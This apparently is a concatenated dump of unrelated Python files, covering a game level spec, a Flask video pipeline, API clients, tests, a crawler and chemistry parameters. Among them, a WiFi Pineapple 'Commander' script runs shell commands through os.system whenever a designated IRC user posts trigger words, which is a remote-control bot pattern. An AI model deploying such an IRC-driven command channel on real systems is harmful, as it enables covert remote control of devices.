'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100032: {'type': 'model', 'name': 'copy of <unnamed> (4)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(12.2409, -22.0432, 0.0929851),
'hpr': Vec3(184.764, 0, 0),
'scale': Point3(1.4, 1.4, 1.4),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100033: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-1.1837, 1.79844, 0.0929851),
'hpr': Vec3(170.538, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
10000: {'type': 'nodepath', 'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, -2),
'hpr': Vec3(0, 0, 0),
'scale': 1},
10018: {'type': 'nodepath', 'name': 'rightVertPipes',
'comment': '',
'parentEntId': 10021,
'pos': Point3(-16.4537, -45.3982, -8.4),
'hpr': Vec3(0, 0, 0),
'scale': Point3(0.65, 0.65, 1.56)},
10021: {'type': 'nodepath', 'name': 'rightPipes',
'comment': '',
'parentEntId': 10000,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100001: {'type': 'nodepath', 'name': 'cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(10, 10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100002: {'type': 'nodepath', 'name': 'copy of cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(30, -10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100003: {'type': 'nodepath', 'name': 'copy of cameraTarget1',
'comment': '',
'parentEntId': 0,
'pos': Point3(40, 10, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100005: {'type': 'nodepath', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-30, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100006: {'type': 'nodepath', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-60, 15, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100007: {'type': 'nodepath', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-60, -15, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100009: {'type': 'nodepath', 'name': 'camera3 target',
'comment': '',
'parentEntId': 0,
'pos': Point3(25, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100010: {'type': 'nodepath', 'name': 'copy of camera3 target',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100011: {'type': 'nodepath', 'name': 'copy of camera3 target (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-50, -2, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100013: {'type': 'nodepath', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, 60, 10),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100014: {'type': 'nodepath', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-10, 40, 10),
'hpr': Vec3(0, 0, 0),
'scale': 1},
100018: {'type': 'nodepath', 'name': 'wall1parent',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.53236, 20.7488, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100025: {'type': 'nodepath', 'name': 'wall2',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.36698, -23.6933, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100035: {'type': 'nodepath', 'name': 'targ1',
'comment': '',
'parentEntId': 0,
'pos': Point3(-27.7132, -17.0199, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100036: {'type': 'nodepath', 'name': 'copy of targ1',
'comment': '',
'parentEntId': 0,
'pos': Point3(9.37401, -17.0199, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100038: {'type': 'nodepath', 'name': 'tegrat',
'comment': '',
'parentEntId': 0,
'pos': Point3(8.31643, -40.4532, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100039: {'type': 'nodepath', 'name': 'copy of tegrat',
'comment': '',
'parentEntId': 0,
'pos': Point3(-27.6613, -37.0841, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100040: {'type': 'nodepath', 'name': 'copy of tegrat (2)',
'comment': '',
'parentEntId': 0,
'pos': Point3(-6.48412, -29.8115, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100042: {'type': 'nodepath', 'name': 'gettar',
'comment': '',
'parentEntId': 0,
'pos': Point3(-7.92397, 14.3026, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100043: {'type': 'nodepath', 'name': 'copy of gettar',
'comment': '',
'parentEntId': 0,
'pos': Point3(-23.1978, 15.1905, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1)},
100000: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(33.4453, -2.27555, 0),
'hpr': Point3(-3, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 6.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 10.0,
'modelPath': 0,
'projector': Point3(-3, -3, 25),
'radius': 6.0,
'switchId': 0,
'trackTarget1': 100001,
'trackTarget2': 100002,
'trackTarget3': 100003},
100004: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-58.4773, 4.03197, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 4.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 15.0,
'modelPath': 0,
'projector': Point3(6, 6, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100005,
'trackTarget2': 100006,
'trackTarget3': 100007},
100008: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-22.5923, -33.41, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 17.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 20.0,
'modelPath': 0,
'projector': Point3(12, 16, 32),
'radius': 7.0,
'switchId': 0,
'trackTarget1': 100009,
'trackTarget2': 100010,
'trackTarget3': 100011},
100012: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-9.20073, 65.6563, 8.45),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 7.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 15.0,
'modelPath': 0,
'projector': Point3(0, 0, 17),
'radius': 5,
'switchId': 0,
'trackTarget1': 100014,
'trackTarget2': 100013,
'trackTarget3': 0},
100034: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, -10.5537, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 40.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 20.0,
'modelPath': 0,
'projector': Point3(10, 0, 25),
'radius': 4.0,
'switchId': 0,
'trackTarget1': 100035,
'trackTarget2': 100036,
'trackTarget3': 0},
100037: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-28.9964, -30.2849, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 5.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 12.0,
'modelPath': 0,
'projector': Point3(6, 6, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100039,
'trackTarget2': 100038,
'trackTarget3': 100040},
100041: {'type': 'securityCamera', 'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-32.9569, 19.6137, 0.0470875),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'accel': 12.0,
'damPow': 8,
'hideModel': 0,
'maxVel': 5,
'modelPath': 0,
'projector': Point3(12, 0, 25),
'radius': 5,
'switchId': 0,
'trackTarget1': 100042,
'trackTarget2': 100043,
'trackTarget3': 0}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities, 'scenarios': [
Scenario0]}
|
python
|
__author__ = "The One & Only Javi"
__version__ = "1.0.0"
__start_date__ = "25th July 2020"
__end_date__ = "5th August 2020"
__maintainer__ = "me"
__email__ = "[email protected]"
__requirements__ = "SQL-Alchemy, MySQL," \
" Flask-SQLAlchemy, database.py, " \
"models.py, video_ops.py"
__status__ = "Production"
__description__ = """
This is the main background operations script.
It is meant to be used with app.py, which should call the methods
"""
import mysql.connector
import json
import os
import subprocess
import sys
import requests
import random
from flask import *
from database import *
from video_ops import *
from models import *
from main_ops import *
from sqlalchemy import *
from sqlalchemy.sql import *
from typing import List, Dict
from datetime import datetime
class Update_DB:
def update_after_fragment(con, input_content_id, output_file_path,
video_key, kid):
packaged_content_id = random.randint(0, 100)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Fragmented', output_file_path=output_file_path,
video_key=video_key, kid=kid,
packaged_content_id=packaged_content_id))
output_string = ("\n\n" + datetime.now().strftime(
"%d/%m/%Y %H:%M:%S") +
" - Starting video encryptation with" +
" the following packaged_content_id:")
print(output_string, file=sys.stdout)
print(packaged_content_id, file=sys.stdout)
return packaged_content_id
def update_after_encrypt(con, input_content_id, output_file_path):
output_string = (
"\n\n" +
datetime.now().strftime("%d/%m/%Y %H:%M:%S") +
" - Starting MPEG-DASH transcoding")
print(output_string, file=sys.stdout)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Encrypted', output_file_path=output_file_path))
def update_after_dash(con, input_content_id,
dash_output, packaged_content_id):
output_string = ("\n\n" + datetime.now().strftime(
"%d/%m/%Y %H:%M:%S") +
" - Everything went successful. Returning JSON")
print(output_string, file=sys.stdout)
result = con.execute(
uploaded_videos.update().where(
uploaded_videos.c.input_content_id
== input_content_id).values(
status='Ready', url=dash_output))
"""We return 1 for successful, url address,
and packaged_content_id"""
output = (1, dash_output, packaged_content_id)
return output
|
python
|
from .PZT import PZTMountedGrounded
|
python
|
from robofab.world import CurrentGlyph
from robofab.pens.filterPen import thresholdGlyph
d = 10
thresholdGlyph(CurrentGlyph(), d)
|
python
|
# Two-sided notes
create_table_notes_ab = """
create table if not exists notes_ab
(
id text,
front text,
back text,
PRIMARY KEY(id)
)
"""
# One-sided notes
create_table_notes_qa = """
create table if not exists notes_qa
(
id text,
front text,
back text,
PRIMARY KEY(id)
)
"""
# The join table for notes/tags n:m relation
create_table_tags = """
create table if not exists tags
(
note_id text,
tag text,
PRIMARY KEY(note_id, tag)
)
"""
|
python
|
import pysftp
server_host = "demo.wftpserver.com"
username = "demo"
password = "demo"
with pysftp.Connection(server_host, username=username, password=password,port=2222)as sftp:
print(sftp.pwd)
# with sftp.cd('public'): # temporarily chdir to public
# sftp.put('/my/local/filename') # upload file to public/ on remote
# sftp.get('remote_file') # get a remote file
#added a new file
|
python
|
# -*- coding: utf-8 -*-
"""
netvisor.responses.products
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2016 by Fast Monkeys Oy.
:license: MIT, see LICENSE for more details.
"""
from ..schemas import GetProductSchema, ProductListSchema
from .base import Response
class ProductListResponse(Response):
schema_cls = ProductListSchema
tag_name = 'product_list'
class GetProductResponse(Response):
schema_cls = GetProductSchema
tag_name = 'product'
|
python
|
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import requests
import urllib
import logging
import boundary.util as util
class ApiCall(object):
def __init__(self, api_host="api.truesight.bmc.com", email=None, api_token=None):
"""
:param api_host: api end point host
:param email: TrueSight Pulse account e-mail
:param api_token: TrueSight Pulse api token
:return: returns nothing
:Example:
from boundary import API
api = API(email="[email protected]", api_token="api.xxxxxxxxxx-yyyy"
"""
self._kwargs = None
self._methods = {"DELETE": self._do_delete,
"GET": self._do_get,
"POST": self._do_post,
"PUT": self._do_put}
self._api_host = "premium-api.boundary.com"
self._email = None
self._api_token = None
self._curl = False
# All member variables related to REST CALL
self._scheme = "https"
self._method = "GET"
self._headers = None
self._data = None
self._url = None
self._path = None
self._url_parameters = None
self._api_result = None
self.logLevel = None
# Set the api_host, email, api token set by environment
# variables then override with those passed in
self._get_environment()
if api_host is not None:
self._api_host = api_host
if email is not None:
self._email = email
if api_token is not None:
self._api_token = api_token
#
# data
#
@property
def data(self):
"""
Value of the HTTP payload
:return:
"""
return self._data
@data.setter
def data(self, data):
self._data = data
#
# headers
#
@property
def headers(self):
return self._headers
@headers.setter
def headers(self, headers):
self._headers = headers
#
# method
#
@property
def method(self):
"""
"""
return self._method
@method.setter
def method(self, value):
"""
Before assigning the value validate that is in one of the
HTTP methods we implement
"""
keys = self._methods.keys()
if value not in keys:
raise AttributeError("Method value not in " + str(keys))
else:
self._method = value
#
# path
#
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
#
# url_parameters
#
@property
def url_parameters(self):
return self._url_parameters
@url_parameters.setter
def url_parameters(self, url_parameters):
self._url_parameters = url_parameters
def _get_environment(self):
"""
Gets the configuration stored in environment variables
"""
if 'TSP_EMAIL' in os.environ:
self._email = os.environ['TSP_EMAIL']
if 'TSP_API_TOKEN' in os.environ:
self._api_token = os.environ['TSP_API_TOKEN']
if 'TSP_API_HOST' in os.environ:
self._api_host = os.environ['TSP_API_HOST']
else:
self._api_host = 'api.truesight.bmc.com'
def _get_url_parameters(self):
"""
Encode URL parameters
"""
url_parameters = ''
if self._url_parameters is not None:
url_parameters = '?' + urllib.urlencode(self._url_parameters)
return url_parameters
def metric_get(self, enabled=False, custom=False):
"""
Returns a metric definition identified by name
:param enabled: Return only enabled metrics
:param custom: Return only custom metrics
:return Metrics:
"""
self.path = 'v1/metrics?enabled={0}&{1}'.format(enabled, custom)
self._call_api()
self._handle_results()
return self.metrics
def get_api_parameters(self):
pass
def handle_api_results(self):
pass
def _do_get(self):
"""
HTTP Get Request
"""
return requests.get(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_delete(self):
"""
HTTP Delete Request
"""
return requests.delete(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_post(self):
"""
HTTP Post Request
"""
return requests.post(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def _do_put(self):
"""
HTTP Put Request
"""
return requests.put(self._url, data=self._data, headers=self._headers, auth=(self._email, self._api_token))
def good_response(self, status_code):
"""
Determines what status codes represent a good response from an API call.
"""
return status_code == requests.codes.ok
def form_url(self):
return "{0}://{1}/{2}{3}".format(self._scheme, self._api_host, self._path, self._get_url_parameters())
def _curl_output(self):
headers = ""
if self._headers is not None:
for key in self._headers:
headers = headers + ' -H "{0}: {1}"'.format(key, self._headers[key])
data = None
if self._data is not None:
data = " -d '{0}'".format(self._data)
else:
data = ''
url = ' "{0}"'.format(self.form_url())
print('curl -X {0} -u "{1}:{2}"{3}{4}{5}'.format(self._method,
self._email,
self._api_token,
headers,
data,
url))
def _call_api(self):
"""
Make an API call to get the metric definition
"""
self._url = self.form_url()
if self._headers is not None:
logging.debug(self._headers)
if self._data is not None:
logging.debug(self._data)
if len(self._get_url_parameters()) > 0:
logging.debug(self._get_url_parameters())
result = self._methods[self._method]()
if not self.good_response(result.status_code):
logging.error(self._url)
logging.error(self._method)
if self._data is not None:
logging.error(self._data)
logging.error(result)
self._api_result = result
def handle_key_word_args(self):
pass
def api_call(self):
self._get_environment()
self.handle_key_word_args()
self.get_api_parameters()
self._call_api()
return self._handle_api_results()
def _handle_api_results(self):
result = None
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
result = json.loads(self._api_result.text)
return result
|
python
|
#!/usr/bin/python3
from venus.stock_base import StockEventBase
class EventStockFlag(StockEventBase):
def flag_quit_stock(self, stock_code):
import datetime
import pandas as pd
from datetime import date
from dev_global.env import TIME_FMT
result = self.mysql.select_values(stock_code, 'trade_date')
if not result.empty:
result = result[0].tolist()
d = datetime.date.today() - result[-1]
if d.days > 150:
return True
else:
return False
else:
return False
def flag_index(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'i'}
)
self.mysql.session.commit()
return 1
def flag_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 't'}
)
self.mysql.session.commit()
return 1
def flag_b_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'b'}
)
self.mysql.session.commit()
return 1
def flag_hk_stock(self, stock_code):
from venus.form import formStockManager
result = self.mysql.session.query(
formStockManager.stock_code,
formStockManager.flag
).filter_by(stock_code=stock_code)
if result:
result.update(
{"flag": 'h'}
)
self.mysql.session.commit()
return 1
if __name__ == "__main__":
import re
from dev_global.env import GLOBAL_HEADER
from venus.stock_flag import EventStockFlag
event = EventStockFlag(GLOBAL_HEADER)
stock_list = event.get_all_security_list()
for stock_code in stock_list:
if re.match(r'^SH000|^SH950|^SZ399', stock_code):
event.flag_index(stock_code)
|
python
|
class Solution:
def makesquare(self, matchsticks: List[int]) -> bool:
if len(matchsticks) < 4:
return False
perimeter = sum(matchsticks)
if perimeter % 4 != 0:
return False
A = sorted(matchsticks)[::-1]
def dfs(selected: int, edges: List[int]) -> bool:
if selected == len(A):
return all(edge == edges[0] for edge in edges)
for i, edge in enumerate(edges):
if A[selected] > edge:
continue
edges[i] -= A[selected]
if dfs(selected + 1, edges):
return True
edges[i] += A[selected]
return False
return dfs(0, [perimeter // 4] * 4)
|
python
|
#!/usr/bin/env python
tuple= ["Juan", 5, 20.80, "HOLA"]
tuple2= [1,2,3]
lista3= [[1,2,3], [1, 3, 6], "HOLA"]
print tuple[0]
print tuple[1:2]
print tuple[2:]
print tuple *2
print tuple+tuple2
print lista3
|
python
|
# Copyright 2016-2017 Curtis Sand <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tasks core library."""
import pkgutil
import inspect
import os.path
from escadrille.verbosity import dprint
from escadrille.verbosity import vprint
def find_tasks(module, prefix):
"""Return an enum of config file tasks mapping names to task callables."""
dprint('lib.tasks.core: finding tasks in %s (prefix: %s)' %
(module, prefix))
task_map = {}
for importer, modname, ispkg in pkgutil.walk_packages([module], prefix):
if ispkg:
continue
module = importer.find_module(modname).load_module(modname)
for _, cls in inspect.getmembers(module, inspect.isclass):
if issubclass(cls, Task) and cls != Task:
task_map[cls.config_name] = cls
dprint('task_map: %s' % task_map)
return task_map
class TaskCore(object):
"""An internal class to be shared by option mixins and Task objects."""
config_name = 'noop'
# constant for easy output formatting
indent = ' '
msg_template = '%s%s=%s\n'
def __init__(self, config_file=None, tag=None, shared_state=None):
"""Set up instance variables for an escadrille task object."""
self.config_file = config_file
self.tag = tag
self.shared_state = shared_state
self.warnings, self.errors, self.status = None, None, None
self._clear_status()
self.loaded = False
def load_config(self):
"""A method to be subclassed to load info from the config file."""
if not self.loaded:
self.dprint('Loading the config for %s.' % self.tag)
self._load_config()
self.loaded = True
def _load_config(self):
"""An internal method for subclasses to load their config values."""
pass
def _clear_status(self):
"""Reset the warnings and errors lists and the status code."""
self.warnings = []
self.errors = []
self.status = None
def _set_status(self):
"""Set error status to the length of the warnings and errors lists."""
self.status = len(self.errors)
def dprint(self, msg):
"""Call the conditional debug print method."""
dprint(msg)
def vprint(self, msg):
"""Call the conditional verbose print method."""
vprint(msg)
@staticmethod
def sanitize_path(path):
"""Take a string and run it through some sanitization methods."""
return os.path.abspath(os.path.expanduser(path))
@property
def config_snippet_name(self):
"""Create a config string for the name of the current task."""
return "%stask=%s\n" % (self.indent, self.config_name)
class Task(TaskCore):
"""Base Task object for Escadrille.
The config_name attribute is used to reference the task class from the
config file.
The __init__ and __call__ methods should be implemented by the subclasses.
The constructor should configure the task with everything needed to perform
the task. A well designed task does not have state and can therefore be
repeated. The task subclass needs to implement any checks or validation
required to operation in this way.
The call method clears the "warnings", "errors" and "status" attributes
before starting the task and then can use the "_set_status" method to
update the status appropriately at the end of the task.
"""
def __call__(self, *args, **kwargs):
"""Execute the core task behaviour."""
self._clear_status()
self.load_config()
self.dprint(self.debug_msg())
def debug_msg(self):
"""If supported, generate and return a debug string."""
self.load_config()
return "%s Debug" % self.__class__.__name__
@property
def default_config(self):
"""Return a string of default example section for config file."""
self.load_config()
return ""
|
python
|
from plenum.common.constants import ALIAS, SERVICES, VALIDATOR
from plenum.test.helper import sendReqsToNodesAndVerifySuffReplies
from plenum.test.node_catchup.helper import waitNodeDataEquality, \
checkNodeDataForInequality
from plenum.test.pool_transactions.helper import \
updateNodeData
from stp_core.common.log import getlogger
from plenum.test.node_catchup.conftest import whitelist
logger = getlogger()
def test_catch_up_after_demoted(
txnPoolNodeSet, nodeSetWithNodeAddedAfterSomeTxns):
logger.info(
"1. add a new node after sending some txns and check that catch-up "
"is done (the new node is up to date)")
looper, newNode, client, wallet, newStewardClient, \
newStewardWallet = nodeSetWithNodeAddedAfterSomeTxns
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:4])
logger.info("2. turn the new node off (demote)")
node_data = {
ALIAS: newNode.name,
SERVICES: []
}
updateNodeData(looper, newStewardClient,
newStewardWallet, newNode,
node_data)
logger.info("3. send more requests, "
"so that the new node's state is outdated")
sendReqsToNodesAndVerifySuffReplies(looper, wallet, client, 5)
checkNodeDataForInequality(newNode, *txnPoolNodeSet[:-1])
logger.info("4. turn the new node on")
node_data = {
ALIAS: newNode.name,
SERVICES: [VALIDATOR]
}
updateNodeData(looper, newStewardClient,
newStewardWallet, newNode,
node_data)
logger.info("5. make sure catch-up is done "
"(the new node is up to date again)")
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])
logger.info("6. send more requests and make sure "
"that the new node participates in processing them")
sendReqsToNodesAndVerifySuffReplies(looper, wallet, client, 10)
waitNodeDataEquality(looper, newNode, *txnPoolNodeSet[:-1])
|
python
|
#!/usr/bin/python
"""
Commander.py - Python Backend for the WiFi Pineapple Commander module.
Version 2 Codename: Electric Boogaloo
Thanks to: sebkinne & tesla
Foxtrot (C) 2016 <[email protected]>
"""
import os
import ConfigParser
import sys
import socket
import time
import string
import select
import errno
class Commander(object):
print "[*] WiFi Pineapple Commander Module"
def run(self):
while True:
self.fillBuffer()
self.parseCommands()
def parseConfig(self):
if os.path.exists('commander.conf'):
self.config = ConfigParser.RawConfigParser()
self.config.read('commander.conf')
if self.config.has_section('Network') and self.config.has_section('Security') and self.config.has_section('Commands') and self.config.has_section('Other'):
print "[*] Valid configuration file found!"
print ""
else:
print "[!] No valid configuration file found... Exiting!"
sys.exit(1)
self.server = self.config.get('Network', 'Server')
self.port = self.config.getint('Network', 'Port')
self.nick = self.config.get('Network', 'Nickname')
self.channel = self.config.get('Network', 'Channel')
self.master = self.config.get('Security', 'Master')
self.trigger = self.config.get('Security', 'Trigger')
self.commands = self.config.options('Commands')
self.debugmode = self.config.get('Other', 'Debug')
def printConfig(self):
print "[*] Using the following connection settings:"
print " %s" % self.server
print " %d" % self.port
print " %s" % self.nick
print " %s" % self.channel
print ""
print "[*] Using the following security settings:"
print " Master: %s" % self.master
print " Trigger: %s\n" % self.trigger
print "[*] Listing commands:"
for command in self.commands:
print " %s%s" % (self.trigger, command)
print ""
def connect(self):
self.sock = socket.socket()
print "[*] Connecting!"
self.sock.connect((self.server, self.port))
print "[*] Sending nick and user information"
self.sock.send('NICK %s\r\n' % self.nick)
self.sock.send('USER %s 8 * :%s\r\n' % (self.nick, self.nick))
time.sleep(10)
self.sock.send('JOIN %s\r\n' % self.channel)
self.sock.send('PRIVMSG %s :Connected.\r\n' % self.channel)
print "[*] Connected!\n"
def fillBuffer(self):
self.buff = ""
self.sock.setblocking(0)
readable, _, _ = select.select([self.sock], [], [])
if self.sock in readable:
self.buff = ""
cont = True
while cont:
try:
self.buff += self.sock.recv(1024)
except socket.error,e:
if e.errno != errno.EWOULDBLOCK:
sys.exit(1)
cont = False
def parseCommands(self):
for line in self.buff.split('\r\n'):
if self.debugmode.lower() == "on":
print line
line = line.split()
if 'PING' in line:
print "[*] Replying to ping\n"
self.sock.send('PONG ' + line.split()[1] + '\r\n')
for command in self.commands:
if line and line[0].lower().startswith(":" + self.master.lower() + "!"):
if ":" + self.trigger + command in line:
print "[*] Found command %s%s\n" % (self.trigger, command)
self.sock.send('PRIVMSG %s :Executing command %s\r\n' % (self.channel, command))
cmd = self.config.get('Commands', command)
os.system(cmd)
if __name__ == '__main__':
commander = Commander()
commander.parseConfig()
commander.printConfig()
commander.connect()
commander.run()
|
python
|
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from freeswitch import consoleLog
from core.apps import sms_credit_transfer
def chat(message, args):
consoleLog('info', "Credit transfer: %s\n" % args)
from_, request = args.split("|", 1)
sms_credit_transfer.handle_incoming(from_, request)
def fsapi(session, stream, env, args):
# chat doesn't use msg anyway
chat(None, args)
|
python
|
from scrapy.selector import Selector
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.url import urljoin_rfc
from sitegraph.items import SitegraphItem
class GraphspiderSpider(CrawlSpider):
name = 'graphspider'
allowed_domains = ['sastra.edu']
start_urls = ['https://www.sastra.edu/']
rules = (
Rule(LinkExtractor(allow=r'/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
hxs = Selector(response)
i = SitegraphItem()
i['url'] = response.url
i['http_status'] = response.status
llinks=[]
for anchor in hxs.xpath('//a[@href]'):
href=anchor.xpath('@href').extract()[0]
if not href.lower().startswith("javascript"):
llinks.append(urljoin_rfc(response.url,href))
i['linkedurls'] = llinks
return i
|
python
|
from ocean_spark.hooks import OceanSparkHook
from unittest.mock import MagicMock
def test_get_app(successful_get_app: None, get_connection_mock: None) -> None:
hook = OceanSparkHook()
app_dict = hook.get_app("test-app-name")
assert app_dict is not None
assert app_dict["displayName"] == "test app name"
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 26 15:13:29 2022
@author: jasy9
"""
from .topsis import TOPSIS
|
python
|
# Author: Ackerley Cheng
# file encoding: utf-8
def sameList(listA, listB):
return (len(listA) == len(listB)) and (set(listA) == set(listB))
def listInListSet(list, listSet):
for idx, ls in enumerate(listSet):
if sameList(list, ls):
return idx
return -1
# check if listA is a subset of listB
def isSubSet(listA, listB):
for item in listA:
if item not in listB:
return False
return True
# dump rule with beautified format
def beautifiedRuleSet(ruleSet):
ruleSet = list(sorted(ruleSet, key=lambda rule: rule.lift, reverse=True))
if len(ruleSet) <= 0:
out = 'found nothing.'
else:
out = 'Association Rules:\n'
out += '[support,\tconfidence,\tlift,\t\trule\n'
for rule in ruleSet:
out += '[' + str(rule.sup) + ',\t\t' + str(rule.conf)
out += ',\t\t' + str(rule.lift) + ',\t\t'
out += '{IF ' + str(rule.IF) + ' THEN ' + str(rule.THEN) + '} ]'
out += '\n'
return out
|
python
|
from django import forms
from consent.models import Privilege
class PrivilegeForm(forms.ModelForm):
class Meta:
model = Privilege
class ConsentForm(forms.Form):
consents = forms.ModelMultipleChoiceField(Privilege.objects,
widget=forms.CheckboxSelectMultiple, required=False)
|
python
|
import numpy as np
from qm_2019_sss_6.NobleGasModel import NobleGasModel
from qm_2019_sss_6.scf import scf
from qm_2019_sss_6.mp2 import MP2
atomic_coordinates = np.array([[0.0, 0.0, 0.0], [3.0, 4.0, 5.0]])
# Derived from user input
number_of_atoms = len(atomic_coordinates)
# Argon parameters - these would change for other noble gases.
model_parameters = {
'r_hop' : 3.1810226927827516,
't_ss' : 0.03365982238611262,
't_sp' : -0.029154833035109226,
't_pp1' : -0.0804163845390335,
't_pp2' : -0.01393611496959445,
'r_pseudo' : 2.60342991362958,
'v_pseudo' : 0.022972992186364977,
'dipole' : 2.781629275106456,
'energy_s' : 3.1659446174413004,
'energy_p' : -2.3926873325346554,
'coulomb_s' : 0.3603533286088998,
'coulomb_p' : -0.003267991835806299
}
ionic_charge = 6
orbital_types = ['s', 'px', 'py', 'pz']
orbitals_per_atom = len(orbital_types)
